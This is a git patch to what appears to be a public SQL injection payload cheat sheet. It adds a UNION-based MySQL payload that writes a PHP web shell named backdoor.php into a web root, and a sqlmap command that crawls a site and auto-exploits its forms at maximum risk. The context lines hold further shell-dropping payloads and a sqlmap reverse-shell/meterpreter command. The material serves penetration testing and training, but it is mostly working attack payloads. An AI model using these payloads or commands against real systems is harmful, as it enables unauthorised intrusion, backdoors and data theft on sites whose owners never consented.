From 869b29195b5d0bad28a3b724b46f0c23535390ac Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Thu, 4 Oct 2018 19:59:11 +0200
Subject: [PATCH] SQLmap --crawl, --form

---
 SQL injection/MySQL Injection.md |  1 +
 SQL injection/README.md          | 10 ++++++++++
 2 files changed, 11 insertions(+)

diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index 4b3e4f89..01430712 100644
--- a/SQL injection/MySQL Injection.md	
+++ b/SQL injection/MySQL Injection.md	
@@ -123,4 +123,5 @@ SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoo
 SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
 -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
+[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 29b6926f..e99c116a 100644
--- a/SQL injection/README.md	
+++ b/SQL injection/README.md	
@@ -138,6 +138,16 @@ Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn
 ```
 
+Crawl a website with SQLmap and auto-exploit
+
+```powershell
+sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
+
+--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--crawl = how deep you want to crawl a site
+--forms = Parse and test forms
+```
+
 Using TOR with SQLmap
 
 ```powershell